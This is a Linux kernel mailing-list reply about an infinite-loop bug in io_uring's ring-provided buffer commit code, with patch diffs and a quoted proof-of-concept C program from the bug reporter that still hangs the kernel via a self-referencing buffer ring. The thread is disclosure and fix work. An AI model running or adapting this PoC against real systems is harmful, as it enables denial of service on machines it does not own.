[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <8abaf4ad-d457-422d-9e9e-932cab2588e6@kernel.dk>
Date: Wed, 27 Aug 2025 20:08:05 -0600
From: Jens Axboe <axboe@...nel.dk>
To: Qingyue Zhang <chunzhennn@...com>
Cc: aftern00n@...com, io-uring@...r.kernel.org, linux-kernel@...r.kernel.org
Subject: Re: [PATCH 2/2] io_uring/kbuf: fix infinite loop in
io_kbuf_inc_commit()
On 8/27/25 7:36 PM, Qingyue Zhang wrote:
> On 2025-08-27 21:45 UTC, Jens Axboe wrote:
>> I took a closer look and there's another spot where we should be
>> using READ_ONCE() to get the buffer length. How about something like
>> the below rather than the loop work-around?
>>
>>
>> commit 7f472373b2855087ae2df9dc6a923f3016a1ed21
>> Author: Jens Axboe <axboe@...nel.dk>
>> Date: Wed Aug 27 15:27:30 2025 -0600
>>
>> io_uring/kbuf: always use READ_ONCE() to read ring provided buffer lengths
>>
>> Since the buffers are mapped from userspace, it is prudent to use
>> READ_ONCE() to read the value into a local variable, and use that for
>> any other actions taken. Having a stable read of the buffer length
>> avoids worrying about it changing after checking, or being read multiple
>> times.
>>
>> Fixes: c7fb19428d67 ("io_uring: add support for ring mapped supplied buffers")
>> Link: https://lore.kernel.org/io-uring/tencent_000C02641F6250C856D0C26228DE29A3D30A@qq.com/
>> Reported-by: Qingyue Zhang <chunzhennn@...com>
>> Signed-off-by: Jens Axboe <axboe@...nel.dk>
>>
>> diff --git a/io_uring/kbuf.c b/io_uring/kbuf.c
>> index 81a13338dfab..394037d3f2f6 100644
>> --- a/io_uring/kbuf.c
>> +++ b/io_uring/kbuf.c
>> @@ -36,15 +36,18 @@ static bool io_kbuf_inc_commit(struct io_buffer_list *bl, int len)
>> {
>> while (len) {
>> struct io_uring_buf *buf;
>> - u32 this_len;
>> + u32 buf_len, this_len;
>>
>> buf = io_ring_head_to_buf(bl->buf_ring, bl->head, bl->mask);
>> - this_len = min_t(u32, len, buf->len);
>> - buf->len -= this_len;
>> - if (buf->len) {
>> + buf_len = READ_ONCE(buf->len);
>> + this_len = min_t(u32, len, buf_len);
>> + buf_len -= this_len;
>> + if (buf_len) {
>> buf->addr += this_len;
>> + buf->len = buf_len;
>> return false;
>> }
>> + buf->len = 0;
>> bl->head++;
>> len -= this_len;
>> }
>> @@ -159,6 +162,7 @@ static void __user *io_ring_buffer_select(struct io_kiocb *req, size_t *len,
>> __u16 tail, head = bl->head;
>> struct io_uring_buf *buf;
>> void __user *ret;
>> + u32 buf_len;
>>
>> tail = smp_load_acquire(&br->tail);
>> if (unlikely(tail == head))
>> @@ -168,8 +172,9 @@ static void __user *io_ring_buffer_select(struct io_kiocb *req, size_t *len,
>> req->flags |= REQ_F_BL_EMPTY;
>>
>> buf = io_ring_head_to_buf(br, head, bl->mask);
>> - if (*len == 0 || *len > buf->len)
>> - *len = buf->len;
>> + buf_len = READ_ONCE(buf->len);
>> + if (*len == 0 || *len > buf_len)
>> + *len = buf_len;
>> req->flags |= REQ_F_BUFFER_RING | REQ_F_BUFFERS_COMMIT;
>> req->buf_list = bl;
>> req->buf_index = buf->bid;
>> @@ -265,7 +270,7 @@ static int io_ring_buffers_peek(struct io_kiocb *req, struct buf_sel_arg *arg,
>>
>> req->buf_index = buf->bid;
>> do {
>> - u32 len = buf->len;
>> + u32 len = READ_ONCE(buf->len);
>>
>> /* truncate end piece, if needed, for non partial buffers */
>> if (len > arg->max_len) {
>
> I'm afraid this doesn't solve the problem. the value of buf->len
> could be changed before the function is called. Maybe we shouldn't
> trust it at all?
>
> Here is a PoC that can still trigger infinite loop:
>
> #include<liburing.h>
> #include<liburing/io_uring.h>
> #include<netinet/in.h>
> #include<stdint.h>
> #include<sys/socket.h>
> #include<arpa/inet.h>
> #include<stdlib.h>
> int main(){
> struct io_uring ring;
> struct io_uring_buf* buf_info;
>
> posix_memalign((void**)&buf_info, 4096, 4096);
> char* buf = malloc(0x1000);
> struct io_uring_buf_reg reg = {
> .ring_addr = (uint64_t)buf_info,
> .ring_entries = 2
> };
> buf_info[0].addr = (uint64_t)buf_info;
> buf_info[0].len = 0x1000;
> buf_info[0].bid = 0;
> buf_info[0].resv = 1; // tail
> io_uring_queue_init(0x10, &ring, IORING_SETUP_NO_SQARRAY);
> io_uring_register_buf_ring(&ring, ®, IOU_PBUF_RING_INC);
>
> int fds[2];
> socketpair(AF_UNIX, SOCK_DGRAM, 0, fds);
> void* send_buf = calloc(1, 32);
> send(fds[0], send_buf, 32, MSG_DONTWAIT);
>
> struct io_uring_sqe* sqe = io_uring_get_sqe(&ring);
> io_uring_prep_recv(sqe, fds[1], NULL, 0, 0);
> sqe->flags |= 1<<IOSQE_BUFFER_SELECT_BIT;
> io_uring_submit(&ring);
> struct io_uring_cqe* cqe;
> io_uring_wait_cqe(&ring, &cqe);
> }
Gotcha, yes the READ_ONCE() will ensure we only read it once and it
can't get changed in between in that loop, but this one receives into
the buffer ring.
I don't think there's anything wrong with the looping and stopping at
the other end is of course a safe guard, but couldn't we just abort the
loop if we see a 0 sized buffer? At that point we know the buffer is
invalid, or the kernel is buggy, and it'd be saner to stop at that
point. Something ala:
diff --git a/io_uring/kbuf.c b/io_uring/kbuf.c
index 394037d3f2f6..19a8bde5e1e1 100644
--- a/io_uring/kbuf.c
+++ b/io_uring/kbuf.c
@@ -42,7 +42,8 @@ static bool io_kbuf_inc_commit(struct io_buffer_list *bl, int len)
buf_len = READ_ONCE(buf->len);
this_len = min_t(u32, len, buf_len);
buf_len -= this_len;
- if (buf_len) {
+ /* Stop looping for invalid buffer length of 0 */
+ if (buf_len || !this_len) {
buf->addr += this_len;
buf->len = buf_len;
return false;
--
Jens Axboe
Powered by blists - more mailing lists